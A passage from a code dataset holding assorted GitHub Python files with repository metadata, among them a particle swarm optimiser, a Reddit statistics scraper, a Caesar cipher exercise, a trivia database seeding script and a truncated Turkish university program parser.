exists.\"\r\n\t\t\treturn _ppError(msg)\r\n\texcept (IOError, OSError):\r\n\t\tmsg = \"Directory cannot be created! Possibly permission error?\"\r\n\t\treturn _ppError(msg)\r\n\r\ndef osPathSplitHelper(pathToFile):\r\n\tpathObj = Path(pathToFile)\r\n\r\n\tparentDir = str(pathObj.parent)\r\n\tfilename, fileExt = os.path.splitext(pathObj.name)\r\n\r\n\treturn (parentDir, filename, fileExt)","repo_name":"euteryum/mediapy","sub_path":"mediapy/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"4689888123","text":"# coding:utf-8\n\nimport threading\nimport time\n\ngl_num = 0\n\nlock = threading.RLock()\n\n\n# 调用acquire([timeout])时,线程将一直阻塞,\n# 直到获得锁定或者直到timeout秒后(timeout参数可选)。\n# 返回是否获得锁。\ndef Func():\n lock.acquire()#锁上\n global gl_num\n gl_num += 1\n time.sleep(1)\n print (gl_num,time.ctime())\n lock.release()#打开锁\n\n\nfor i in range(10):\n t = threading.Thread(target=Func)\n t.start()","repo_name":"Huanglei2010/pythonStudy","sub_path":"p170807a/src/two/37_8.py","file_name":"37_8.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"17577578593","text":"import matplotlib.pyplot as plt\r\nfrom Results import Gen_Results\r\n# Loading Inputs\r\nfrom Input_Data import InData\r\nimport numpy as np\r\nfrom copy import copy, deepcopy\r\nfrom time import process_time\r\n\r\nstart = process_time()\r\n\r\nPV = InData.PV\r\nWT = InData.WT\r\nBat = InData.Bat\r\nDG = InData.DG\r\nRun_Time = InData.Run_Time\r\nnPop = InData.nPop\r\nMaxIt = InData.MaxIt\r\nc1 = InData.c1\r\nc2 = InData.c2\r\nwdamp = InData.wdamp\r\n\r\n# Problem Definition\r\nfrom Fitness import fitness as cost_function\r\n\r\n\r\nclass Swarm:\r\n def __init__(self, **kwargs):\r\n self.nVar = 5 # number of decision variables\r\n\r\n # Variable: PV number, WT number, Battery number, number of DG, Rated Power Inverter\r\n self.VarMin = np.array([0, 0, 0, 0, 0]) * [PV, WT, Bat, DG, 1] # Lower bound of variables\r\n self.VarMax = np.array([120, 240, 120, 10, 50]) * [PV, WT, Bat, DG, 1] # Upper bound of variables\r\n\r\n # Velocity limits\r\n self.VelMax = 0.3 * (self.VarMax - self.VarMin)\r\n self.VelMin = -self.VelMax\r\n # Solution\r\n self.solution_best_costs = []\r\n self.solution_best_positions = []\r\n self.solution_cost_curve = []\r\n\r\n def optimize(self):\r\n w = InData.w\r\n plt.rcParams[\"font.family\"] = \"Times New Roman\"\r\n fig, ax = plt.subplots(dpi=300)\r\n for tt in range(Run_Time):\r\n\r\n # Initialize particle positions\r\n particle_positions = np.random.uniform(self.VarMin, self.VarMax, (1, nPop, self.nVar))[0]\r\n particle_personal_best_position = deepcopy(particle_positions)\r\n\r\n # Initialize particle velocities\r\n particle_velocities = np.zeros((nPop, self.nVar))\r\n\r\n # Evaluate costs per initial particle\r\n particle_costs = np.apply_along_axis(cost_function, 1, particle_positions)\r\n particle_personal_best_cost = deepcopy(particle_costs)\r\n\r\n # Determine global best\r\n min_cost_index = np.argmin(particle_personal_best_cost)\r\n global_best_position = deepcopy(particle_personal_best_position[min_cost_index])\r\n global_best_cost = particle_personal_best_cost[min_cost_index]\r\n\r\n # Track Best Costs and Mean Costs\r\n best_cost, mean_cost = [], []\r\n\r\n # PSO Main Loop\r\n for it in range(1, MaxIt + 1):\r\n for i in range(nPop):\r\n # Update Velocity\r\n particle_velocities[i] = w * particle_velocities[i] + c1 * np.random.rand(self.nVar) \\\r\n * (particle_personal_best_position[i] - particle_positions[i]) \\\r\n + c2 * np.random.rand(self.nVar) * (\r\n global_best_position - particle_positions[i])\r\n\r\n # Apply Velocity Limits\r\n particle_velocities[i] = np.minimum(np.maximum(particle_velocities[i], self.VelMin), self.VelMax)\r\n\r\n # Update Position\r\n particle_positions[i] += particle_velocities[i]\r\n\r\n # Velocity Mirror Effect\r\n is_outside = \\\r\n (np.less(particle_positions[i], self.VarMin) | np.greater(particle_positions[i], self.VarMax))[0]\r\n particle_velocities[i][is_outside] = -particle_velocities[i][is_outside]\r\n\r\n # Apply Position Limits\r\n particle_positions[i] = np.minimum(np.maximum(particle_positions[i], self.VarMin), self.VarMax)\r\n\r\n # Evaluation\r\n particle_costs[i] = cost_function(particle_positions[i])\r\n\r\n # Update Personal Best\r\n if particle_costs[i] < particle_personal_best_cost[i]:\r\n particle_personal_best_position[i] = particle_positions[i]\r\n particle_personal_best_cost[i] = particle_costs[i]\r\n\r\n # Update Global Best\r\n if particle_personal_best_cost[i] < global_best_cost:\r\n global_best_cost = particle_personal_best_cost[i]\r\n global_best_position = particle_personal_best_position[i]\r\n\r\n # Add new best cost and mean cost\r\n best_cost.append(global_best_cost)\r\n mean_cost.append(sum(particle_personal_best_cost) / nPop)\r\n\r\n # Update inertia factor\r\n w *= wdamp\r\n\r\n # Print results for current iteration\r\n print(\r\n f'Run time = {tt}, Iteration = {it}, Best Cost = {round(global_best_cost, 4)}, Mean Cost = {round(mean_cost[-1], 4)}')\r\n\r\n self.solution_best_costs.append(global_best_cost)\r\n self.solution_best_positions.append(global_best_position)\r\n self.solution_cost_curve.append(best_cost)\r\n\r\n ax.plot(best_cost, '-.', label=str(tt+1))\r\n\r\n Best= [self.solution_best_costs[t] for t in range(len(self.solution_best_positions))]\r\n index = np.argmin(Best)\r\n X = self.solution_best_positions[index]\r\n\r\n # Run Results file\r\n\r\n plt.xlabel('Iteration')\r\n plt.ylabel('Cost of Best Solution')\r\n plt.title('Convergence curve')\r\n plt.legend() # Display the legend\r\n plt.tight_layout()\r\n plt.show()\r\n Gen_Results(X)\r\n\r\n","repo_name":"Sas1997/SAMA","sub_path":"Python Source Code Final Version/swarm.py","file_name":"swarm.py","file_ext":"py","file_size_in_byte":5414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"5423959591","text":"\r\nfrom asyncpraw import Reddit\r\nfrom Server import Server\r\nfrom asyncio import sleep\r\nfrom util import BD, loop, CommentBD, PostBD, re_q2, re_q\r\nfrom time import time\r\nfrom typing import List\r\nimport config\r\n\r\n\r\nclass RedditStat:\r\n def __init__(self, sub):\r\n self.target_sub = sub\r\n self.reddit_session = None\r\n self.max_get_post = 1000\r\n self.max_time_stat = 3600*24*2\r\n\r\n self.parser = (\r\n (3600, 60*15),\r\n (3600*3, 60*30),\r\n (3600*6, 60*45),\r\n (3600*24, 60*90),\r\n (3600*24*3, 60*60*4),\r\n (3600*24*7, 60*60*8),\r\n (3600*24*14, 60*60*16),\r\n (3600*24*30, 60*60*30),\r\n (3600*24*90, 60*60*24*5),\r\n )\r\n\r\n self.parser = sorted(self.parser, reverse=True)\r\n\r\n def auth(self, client_id: str, client_secret: str):\r\n user_agent = ('Mozilla/5.0 (Windows NT 6.2; WOW64; rv:53.0) AppleWebKit/534.50.2 '\r\n 'Firefox/49.0 Chrome/58.0.2902.81 Chromium/49.0.2623.108 OPR/43.0.2442.849')\r\n\r\n self.reddit_session = Reddit(client_id=client_id,\r\n client_secret=client_secret,\r\n user_agent=user_agent)\r\n\r\n async def get_new_posts(self):\r\n while True:\r\n subreddit = await self.reddit_session.subreddit(self.target_sub)\r\n t = int(time())\r\n ind = 0\r\n async for post in subreddit.new(limit=self.max_get_post):\r\n ind += 1\r\n _time = int(post.created_utc)\r\n if t - _time > self.max_time_stat:\r\n break\r\n\r\n self.save_post(post, t)\r\n\r\n if ind % 25 == 0:\r\n print(ind, '/', self.max_get_post)\r\n\r\n await sleep(60*20)\r\n\r\n def save_post(self, post, t):\r\n ans: List[PostBD] = BD.post.get(post.id)\r\n if not ans:\r\n content = str(post.media or post.selftext or post.url)\r\n score = f'{post.score}={t}'\r\n BD.post.put(post.id, post.title, post.score, score, content, int(post.created_utc), t)\r\n else:\r\n score = f'{ans[0].score},{post.score}={t}'\r\n ans[0].up(score_now=post.score, score=score)\r\n\r\n async def get_comments(self, post_id: str):\r\n post = await self.reddit_session.submission(post_id)\r\n comments_list = await post.comments()\r\n await comments_list.replace_more(limit=None)\r\n now_time = time()\r\n for j, comment in enumerate(await comments_list.list()):\r\n if now_time - post.created_utc > self.max_time_stat:\r\n continue\r\n\r\n if comment:\r\n self.save_comment(self.comment(comment, post_id))\r\n else:\r\n print(comment)\r\n\r\n #if j % 25 == 0:\r\n # print('get comment', post_id, j)\r\n\r\n def comment(self, comment, post_id):\r\n root_id = '0' if comment.is_root else comment.parent_id.split('_')[-1]\r\n author = comment.author.name if comment.author else '[delete]'\r\n return CommentBD(comment.id, root_id, post_id, comment.body, comment.score,\r\n comment.score, int(comment.created_utc), author)\r\n\r\n def save_comment(self, comment: CommentBD):\r\n ans: List[CommentBD] = BD.comment.get(comment.id)\r\n t = int(time())\r\n body = re_q.sub(\"'\", comment.body)\r\n body = re_q2.sub(',', body)\r\n\r\n if ans:\r\n ans_last_body = ans[0].body.split(',,')[-1].split('||')[0]\r\n else:\r\n ans_last_body = ''\r\n\r\n if not ans:\r\n body = f'{body}||{t}'\r\n score = f'{comment.score}={t}'\r\n BD.comment.put(comment.id, comment.root_id, comment.post_id, body,\r\n comment.score, score, comment.time, comment.author)\r\n\r\n elif ans_last_body != body:\r\n body = f'{ans[0].body},,{body}||{t}'\r\n score = f'{ans[0].score},{comment.score}={t}'\r\n BD.comment.up(comment.id, body=body, score=score, score_now=comment.score)\r\n\r\n else:\r\n score = f'{ans[0].score},{comment.score}={t}'\r\n BD.comment.up(comment.id, score=score, score_now=comment.score)\r\n\r\n def is_post_ok(self, post: PostBD):\r\n now_time = int(time())\r\n\r\n last_t = int(now_time - post.time_pars)\r\n t = int(now_time - post.time_post)\r\n\r\n for p, p_itr in self.parser:\r\n if p < t:\r\n if last_t > p_itr:\r\n post.up(time_pars=now_time)\r\n return True\r\n else:\r\n return False\r\n\r\n return False\r\n\r\n async def get_new_comments(self):\r\n ans: List[PostBD] = BD.post.get_all()\r\n count = 1\r\n for i, post in enumerate(ans):\r\n\r\n if not self.is_post_ok(post):\r\n continue\r\n\r\n await self.get_comments(post.id)\r\n await sleep(0.1)\r\n\r\n print('get comment post', post.id, count, i, '/', len(ans))\r\n\r\n count += 1\r\n\r\n print('end', count - 1, len(ans))\r\n\r\n async def main(self):\r\n while True:\r\n await self.get_new_comments()\r\n await sleep(60*6)\r\n\r\n\r\nasync def on_start(_):\r\n stat = RedditStat(config.sub)\r\n stat.auth(config.client_id, config.client_secret)\r\n\r\n loop.add(stat.get_new_posts()).add(stat.main()).start()\r\n\r\n\r\nif __name__ == '__main__':\r\n Server().add(on_start).run()\r\n","repo_name":"vurdolag/reddit_statistic","sub_path":"RedditStat.py","file_name":"RedditStat.py","file_ext":"py","file_size_in_byte":5501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"13761668393","text":"#question: https://leetcode.com/problems/binary-search\n#approach: binary search, using my personal preferred template - https://algs4.cs.princeton.edu/11model/BinarySearch.java.html\n\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n lo = 0\n hi = len(nums) - 1\n \n while (lo <= hi):\n mid = lo + int((hi - lo)/2)\n if nums[mid] < target:\n lo = mid+1\n elif nums[mid] > target:\n hi = mid-1\n else:\n return mid\n \n return -1\n ","repo_name":"SUKESH127/bitsherpa","sub_path":"[7] Binary Search Leetcode Solutions /binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"30044068856","text":"# *************************************************************************\n# *********************** GETTER METHODS **********************************\n# *************************************************************************\nimport os\nimport pandas as pd\n\n\ndef get_studies():\n studies = ['AG', 'CVDF', 'GLS', 'GEVERSC', 'GEVERSM', 'HMP', 'MUC',\n 'PRJNA418765', 'PRJNA436359', 'QIITA10184', 'QIITA10342', 'QIITA10567',\n 'QIITA1448', 'QIITA2202', 'QIITA550']\n\n return studies\n\n\ndef get_metadata_label():\n '''\n Method to get metadata labels and the response label from data set\n '''\n metadata = ['col_site', 'diagnosis', 'sample_title', 'stool_biopsy', 'studyID', 'uc_cd']\n label = 'diagnosis'\n return metadata, label\n\n\ndef get_studies_by_label():\n dict_studies = {'zero': ['QIITA10567', 'QIITA10184', 'QIITA2202', 'QIITA550', 'QIITA850',\n 'QIITA10342', 'QIITA1448', 'AG', 'CVDF'],\n 'both': ['GEVERSM', 'MUC', 'GLS', 'HMP', 'GEVERSC'],\n 'one': ['PRJNA418765', 'HSCT', 'PRJNA436359', 'Sprockett']}\n\n return dict_studies\n\n\ndef get_component(exp_name, component):\n '''\n exp_name: experiment name, ex: PFAM-LAS-BRM-RF\n components: 'data', 'norm', 'batch', 'model'\n '''\n mapping = {'data': 0,\n 'norm': 1,\n 'batch': 2,\n 'model': 3,\n 'norm2': 4}\n\n exp_split = exp_name.split('-')\n return exp_split[mapping[component]]\n\n\ndef get_pwd(level=0):\n '''\n Method that return a UNIX style string of current\n directory if level = 0. Setting level to -1 and\n below goes down by that many levels.\n '''\n sysname = os.name\n work_dir = os.getcwd()\n if sysname == 'nt': # if a windows system\n w = work_dir.split('\\\\')\n if level < 0:\n work_dir = '/'.join(w[:level]) # ~/pipeline_v2\n else:\n work_dir = '/'.join(w)\n else:\n w = work_dir.split('/')\n if level < 0:\n work_dir = '/'.join(w[:level]) # ~/pipeline_v2\n else:\n work_dir = '/'.join(w)\n\n return work_dir\n\n\ndef save_preprocessed_df(df, exp_name, study=None, full=False):\n if full:\n file = '{}-{}-{}-full'.format(get_component(exp_name, component='data'),\n get_component(exp_name, component='norm'),\n get_component(exp_name, component='batch'))\n else:\n file = '{}-{}-{}'.format(get_component(exp_name, component='data'),\n get_component(exp_name, component='norm'),\n get_component(exp_name, component='batch'))\n if study is not None:\n file = '{}-{}'.format(file, study.upper())\n\n path = get_pwd() + '/datasets/batch_reduced'\n if not os.path.isdir(path):\n os.makedirs(path)\n\n df.to_pickle('{}/{}.pkl'.format(path, file))\n\n\ndef get_preprocessed_df(exp_name, study=None, full=False):\n if full:\n file = '{}-{}-{}-full'.format(get_component(exp_name, component='data'),\n get_component(exp_name, component='norm'),\n get_component(exp_name, component='batch'))\n else:\n file = '{}-{}-{}'.format(get_component(exp_name, component='data'),\n get_component(exp_name, component='norm'),\n get_component(exp_name, component='batch'))\n\n if study is not None:\n file = '{}-{}'.format(file, study.upper())\n\n path = get_pwd() + '/datasets/batch_reduced'\n if not os.path.isdir(path):\n os.makedirs(path)\n\n df = pd.read_pickle('{}/{}.pkl'.format(path, file))\n return df\n\n\ndef get_ensemble_names():\n ens_names = ['E_RF_MLP_LR', 'E_RF_MLP_SVC', 'E_RF_SVC_LR', 'E_RF_SVC_SVC', \n 'E_RF_KNN_LR', 'E_RF_KNN_SVC', 'E_MLP_SVC_LR', 'E_MLP_SVC_SVC', \n 'E_MLP_KNN_LR', 'E_MLP_KNN_SVC', 'E_SVC_KNN_LR', 'E_SVC_KNN_SVC',\n 'E_RF_MLP_SVC_LR', 'E_RF_MLP_SVC_SVC', 'E_RF_MLP_KNN_LR', 'E_RF_MLP_KNN_SVC', \n 'E_RF_SVC_KNN_LR', 'E_RF_SVC_KNN_SVC', 'E_MLP_SVC_KNN_LR', 'E_MLP_SVC_KNN_SVC']\n return ens_names\n","repo_name":"phylatechnologies/ibd_classification_benchmark","sub_path":"metadata/getters.py","file_name":"getters.py","file_ext":"py","file_size_in_byte":4249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"3340153724","text":"import logging\nimport random\n\nfrom datetime import timedelta\nfrom django.utils import timezone\nfrom .createProductDetail import create_product_detail\n\n\ndef create_batch_product_details_task(product_class,\n column_name,\n view_json,\n serializer_json,\n task_name, batch_size=10,\n min_time_delay=1, max_time_delay=5):\n product_id_list = list(set(list(product_class.objects.values_list(column_name, flat=True))))\n batchEnd = 0\n total_product_count = len(product_id_list)\n max_iteration_count = (total_product_count // batch_size) + 1\n print(\"Total product count:\", total_product_count)\n print(\"Max iteration count: \", max_iteration_count)\n iteration = 0\n while iteration < max_iteration_count:\n batchStart = batchEnd\n batchEnd = batchStart + batch_size\n iteration += 1\n\n if batchStart > total_product_count-1:\n break\n\n time_delay_in_seconds = random.randint(min_time_delay, max_time_delay)\n next_run = timezone.now() + timedelta(seconds=time_delay_in_seconds)\n\n try:\n print('Iteration count {iteration} Creating product details for batch start:{batchStart}-end:{batchEnd}'\n .format(iteration=iteration, batchStart=batchStart, batchEnd=batchEnd))\n\n create_product_detail(product_id_list[batchStart:batchEnd],\n view_json=view_json,\n serializer_json=serializer_json,\n schedule=time_delay_in_seconds,\n verbose_name=task_name + \"-\" + \"batch start-\" +\n str(batchStart) + \"-\" + \"batch end-\" +\n str(batchEnd) + str(next_run))\n except Exception as e:\n print(\"Error in batch product details task creation.\", e)\n\n\n","repo_name":"mesarikaya/Product-Scraper-Microservice","sub_path":"products/views/helpers/createBatchProductDetailsTask.py","file_name":"createBatchProductDetailsTask.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"72601239324","text":"import string \r\ndict1 = {}\r\ndict2 = {}\r\n\r\ndef assign():\r\n str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\r\n cnt = 0\r\n for i in str:\r\n dict1[cnt] = i\r\n dict2[i] = cnt\r\n cnt = cnt+1\r\n\r\ndef encrypt(shift):\r\n file1 = open('input.txt', 'r') \r\n file2 = open('encrypted.txt', 'w') \r\n while 1:\r\n i = file1.read(1) \r\n if not i:\r\n break\r\n if (i.isalpha() == False):\r\n file2.write(i)\r\n else:\r\n a = i.upper()\r\n b = dict2[a]\r\n b = (b+shift)%26\r\n #print('b = ', b)\r\n c = dict1[b]\r\n file2.write(c)\r\n file2.close()\r\n print('encrypted text is')\r\n file2 = open('encrypted.txt', 'r')\r\n print(file2.read())\r\n file2.close()\r\n\r\ndef decrypt(shift): \r\n file2 = open('encrypted.txt', 'r')\r\n file3 = open('decrypted.txt', 'w') \r\n while 1:\r\n i = file2.read(1)\r\n if not i:\r\n break\r\n if (i.isalpha() == False):\r\n file3.write(i)\r\n else:\r\n a = i.upper()\r\n b = dict2[a]\r\n b = (b-shift)%26\r\n #print('b = ', b)\r\n c = dict1[b]\r\n file3.write(c)\r\n print('decrypted text is')\r\n file3 = open('decrypted.txt', 'r')\r\n print(file3.read())\r\n file3.close()\r\n\r\n\r\n\r\nassign()\r\n\r\n","repo_name":"devayani-kv/ciphers","sub_path":"functions_caesar.py","file_name":"functions_caesar.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"30743824057","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom app import db\nfrom app.models import Categoria, Pregunta, Respuesta\n\ndb.drop_all()\ndb.create_all()\n\n#categorias\nc_historia = Categoria(nombre=\"Historia\")\nc_geogra = Categoria(nombre=\"Geografía\")\nc_deporte = Categoria(nombre=\"Deportes\")\nc_arte = Categoria(nombre=\"Arte\")\n\n#preguntas categoria historia --------------------------------------------------\np_descAmerica = Pregunta(texto=\"¿En que año se descubrio américa?\", categoria=c_historia)\np_orientales = Pregunta(texto=\"¿Cuantos eran los 33 orientales?\", categoria=c_historia)\np_napoleon = Pregunta(texto=\"¿Donde nació Napoleon?\", categoria=c_historia)\n\n#respuestas categoria historia\nr_descAmerica1 = Respuesta(texto=\"1492\", es_correcta=\"True\", pregunta=p_descAmerica)\nr_descAmerica2 = Respuesta(texto=\"1515\", es_correcta=\"False\", pregunta=p_descAmerica)\nr_descAmerica3 = Respuesta(texto=\"1980\", es_correcta=\"False\", pregunta=p_descAmerica)\n\nr_orientales1 = Respuesta(texto=\"33\", es_correcta=\"False\", pregunta=p_orientales)\nr_orientales2 = Respuesta(texto=\"menos de 33\", es_correcta=\"False\", pregunta=p_orientales)\nr_orientales3 = Respuesta(texto=\"mas de 33\", es_correcta=\"True\", pregunta=p_orientales)\n\nr_napoleon1 = Respuesta(texto=\"Inglaterra\", es_correcta=\"False\", pregunta=p_napoleon)\nr_napoleon2 = Respuesta(texto=\"Francia\", es_correcta=\"True\", pregunta=p_napoleon)\nr_napoleon3 = Respuesta(texto=\"España\", es_correcta=\"False\", pregunta=p_napoleon)\n\n\n#preguntas categoria geografia --------------------------------------------------\np_amazonas = Pregunta(texto=\"¿En que continente esta el Amazonas?\", categoria=c_geogra)\np_montania = Pregunta(texto=\"¿Cual es la montaña mas alta del mundo?\", categoria=c_geogra)\np_pais = Pregunta(texto=\"¿Que país es el 2do mas grande del mundo en términos de población?\", categoria=c_geogra)\n\n#respuestas categoria geografia\nr_amazonas1 = Respuesta(texto=\"Europa\", es_correcta=\"False\", pregunta=p_amazonas)\nr_amazonas2 = Respuesta(texto=\"Africa\", es_correcta=\"False\", pregunta=p_amazonas)\nr_amazonas3 = Respuesta(texto=\"América\", es_correcta=\"True\", pregunta=p_amazonas)\n\nr_montania1 = Respuesta(texto=\"Cerro chato\", es_correcta=\"False\", pregunta=p_montania)\nr_montania2 = Respuesta(texto=\"El everest\", es_correcta=\"True\", pregunta=p_montania)\nr_montania3 = Respuesta(texto=\"El Aconcagua\", es_correcta=\"False\", pregunta=p_montania)\n\nr_pais1 = Respuesta(texto=\"India\", es_correcta=\"True\", pregunta=p_pais)\nr_pais2 = Respuesta(texto=\"China\", es_correcta=\"False\", pregunta=p_pais)\nr_pais3 = Respuesta(texto=\"Rusia\", es_correcta=\"False\", pregunta=p_pais)\n\n\n#preguntas categoria deporte --------------------------------------------------\np_uyCampeon = Pregunta(texto=\"¿Uruguay va a salir campeon de América?\", categoria=c_deporte)\np_tyson = Pregunta(texto=\"¿Tyson sigue boxeando?\", categoria=c_deporte)\np_copas = Pregunta(texto=\"¿Cuantas copas americas tiene uruguay?\", categoria=c_deporte)\n\n#respuestas categoria deporte\nr_uyCampeon1 = Respuesta(texto=\"Quizas\", es_correcta=\"True\", pregunta=p_uyCampeon)\nr_uyCampeon2 = Respuesta(texto=\"No\", es_correcta=\"False\", pregunta=p_uyCampeon)\nr_uyCampeon3 = Respuesta(texto=\"Si\", es_correcta=\"False\", pregunta=p_uyCampeon)\n\nr_tyson1 = Respuesta(texto=\"No, solo muerde\", es_correcta=\"False\", pregunta=p_tyson)\nr_tyson2 = Respuesta(texto=\"Obviamente\", es_correcta=\"False\", pregunta=p_tyson)\nr_tyson3 = Respuesta(texto=\"Ahora solo actua\", es_correcta=\"True\", pregunta=p_tyson)\n\nr_copas1 = Respuesta(texto=\"14\", es_correcta=\"False\", pregunta=p_copas)\nr_copas2 = Respuesta(texto=\"15\", es_correcta=\"True\", pregunta=p_copas)\nr_copas3 = Respuesta(texto=\"16\", es_correcta=\"False\", pregunta=p_copas)\n\n\n#preguntas categoria arte --------------------------------------------------\np_picasso = Pregunta(texto=\"¿Picasso es el padre del cubismo?\", categoria=c_arte)\np_sixtina = Pregunta(texto=\"¿Quien pintó la capilla sixtina?\", categoria=c_arte)\np_coliseo = Pregunta(texto=\"¿Que estilo tienen las columnas inferiores del Coliseo?\", categoria=c_arte)\n\n#respuestas categoria arte\nr_picasso1 = Respuesta(texto=\"No se\", es_correcta=\"False\", pregunta=p_picasso)\nr_picasso2 = Respuesta(texto=\"No\", es_correcta=\"False\", pregunta=p_picasso)\nr_picasso3 = Respuesta(texto=\"Si\", es_correcta=\"True\", pregunta=p_picasso)\n\nr_sixtina1 = Respuesta(texto=\"Rafael\", es_correcta=\"False\", pregunta=p_sixtina)\nr_sixtina2 = Respuesta(texto=\"Donatello\", es_correcta=\"False\", pregunta=p_sixtina)\nr_sixtina3 = Respuesta(texto=\"Miguel Angel\", es_correcta=\"True\", pregunta=p_sixtina)\n\nr_coliseo1 = Respuesta(texto=\"Dorico\", es_correcta=\"True\", pregunta=p_coliseo)\nr_coliseo2 = Respuesta(texto=\"Jonico\", es_correcta=\"False\", pregunta=p_coliseo)\nr_coliseo3 = Respuesta(texto=\"Corintio\", es_correcta=\"False\", pregunta=p_coliseo)\n\n\n# agregamos todo a la sesión y luego commmiteamos\n#categorias\ndb.session.add(c_historia)\ndb.session.add(c_geogra)\ndb.session.add(c_deporte)\ndb.session.add(c_arte)\n\n#preguntas categoria historia --------------------------------------------------\ndb.session.add(p_descAmerica)\ndb.session.add(p_orientales)\ndb.session.add(p_napoleon)\n\n#respuestas categoria historia\ndb.session.add(r_descAmerica1)\ndb.session.add(r_orientales1)\ndb.session.add(r_napoleon1)\n\ndb.session.add(r_descAmerica2)\ndb.session.add(r_orientales2)\ndb.session.add(r_napoleon2)\n\ndb.session.add(r_descAmerica3)\ndb.session.add(r_orientales3)\ndb.session.add(r_napoleon3)\n\n#preguntas categoria geografia --------------------------------------------------\ndb.session.add(p_amazonas)\ndb.session.add(p_montania)\ndb.session.add(p_pais)\n\n#respuestas categoria geografia\ndb.session.add(r_amazonas1)\ndb.session.add(r_montania1)\ndb.session.add(r_pais1)\n\ndb.session.add(r_amazonas2)\ndb.session.add(r_montania2)\ndb.session.add(r_pais2)\n\ndb.session.add(r_amazonas3)\ndb.session.add(r_montania3)\ndb.session.add(r_pais3)\n\n#preguntas categoria deporte --------------------------------------------------\ndb.session.add(p_uyCampeon)\ndb.session.add(p_tyson)\ndb.session.add(p_copas)\n\n#respuestas categoria deporte\ndb.session.add(r_uyCampeon1)\ndb.session.add(r_tyson1)\ndb.session.add(r_copas1)\n\ndb.session.add(r_uyCampeon2)\ndb.session.add(r_tyson2)\ndb.session.add(r_copas2)\n\ndb.session.add(r_uyCampeon3)\ndb.session.add(r_tyson3)\ndb.session.add(r_copas3)\n\n#preguntas categoria arte --------------------------------------------------\ndb.session.add(p_picasso)\ndb.session.add(p_sixtina)\ndb.session.add(p_coliseo)\n\n#respuestas categoria arte\ndb.session.add(r_picasso1)\ndb.session.add(r_sixtina1)\ndb.session.add(r_coliseo1)\n\ndb.session.add(r_picasso2)\ndb.session.add(r_sixtina2)\ndb.session.add(r_coliseo2)\n\ndb.session.add(r_picasso3)\ndb.session.add(r_sixtina3)\ndb.session.add(r_coliseo3)\n\ndb.session.commit()","repo_name":"defabiouy/trivia_game","sub_path":"populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":6737,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"15988364313","text":"# input parsing\ninput_file = 'day18\\input.txt'\nwith open(input_file) as infile:\n cubes = [[int(elem) for elem in line.strip().split(',')] for line in infile]\nprint(cubes)\n\narea_count = 0\nfor cube in cubes:\n cube_up = [cube[0],cube[1],cube[2]+1]\n cube_down = [cube[0],cube[1],cube[2]-1]\n cube_x_right = [cube[0]+1,cube[1],cube[2]]\n cube_x_left = [cube[0]-1,cube[1],cube[2]]\n cube_y_right = [cube[0],cube[1]+1,cube[2]]\n cube_y_left = [cube[0],cube[1]-1,cube[2]]\n adjacent_cubes = [cube_up,cube_down,cube_x_left,cube_x_right,cube_y_left,cube_y_right]\n\n for adj_cube in adjacent_cubes:\n if adj_cube not in cubes:\n area_count += 1\nprint(area_count)","repo_name":"Vallfors99/AdventOfCode-2022","sub_path":"day18/part_1.py","file_name":"part_1.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"32820450196","text":"\n'''\nAuthor: Mustafa Camurli\nData: : 16.08.2016 (Tuesday)\nE-mail: mustafa.camurli@gmail.com\n'''\n\nimport re\nimport sys\nimport string\n\nPROGRAM_NAME_STRING = \"Bilgisayar Mühendisliği\"\n\nPROGRAM_LANG_ENGLISH_STRING = \"(İngilizce)\"\nPROGRAM_LANG_GERMAN_STRING = \"(Almanca)\"\n\nPROGRAM_EVENING_EDU_STRING = \"(İÖ)\"\n\nPROGRAM_SCHOLARSHIP_MARKER_STRING = \"Burslu\"\nPROGRAM_25_PER_SCHOLARSHIP_STRING = \"%25 Burslu\"\nPROGRAM_50_PER_SCHOLARSHIP_STRING = \"%50 Burslu\"\nPROGRAM_75_PER_SCHOLARSHIP_STRING = \"%75 Burslu\"\nPROGRAM_NO_SCHOLARSHIP_STRING = \"Ücretli\"\nPROGRAM_FULL_SCHOLARSHIP_STRING = \"Tam Burslu\"\n\nPROGRAM_TECH_HIGH_SCHOOL_PRIV = \"(M.T.O.K.)\"\n\nPROGRAM_FIELD_MARKER_STRING = \"MF-4\"\n\nPROGRAM_SCORE_NONE_STRING = \"---\"\n\nclass Language(enumerate):\n TURKISH = 1\n ENGLISH = 2\n GERMAN = 3\n\nclass MalformedUniversityStringException(Exception):\n def __init__(self, str):\n Exception.__init__(self, \"MalformedUniversityStringException\")\n self.str = str\n\nclass MalformedFacultyStringException(Exception):\n def __init__(self, str):\n Exception.__init__(self, \"MalformedFacultyStringException\")\n self.str = str\n\nclass MalformedProgramStateStringException(Exception):\n def __init__(self, str):\n Exception.__init__(self, \"MalformedProgramStateStringException\")\n self.str = str\n\nclass Program:\n __name = None\n __language = None\n __scholarship = None\n __is_evening_edu = None\n __is_tech_high_school_priv = None\n __student_quota = None\n __num_of_student_got_in = None\n __score_lower_bound = None\n __score_upper_bound = None\n\n def __get_program_lang_from_string(self, program_str):\n if ( -1 != program_str.find(PROGRAM_LANG_ENGLISH_STRING) ):\n return (Language.ENGLISH)\n elif ( -1 != 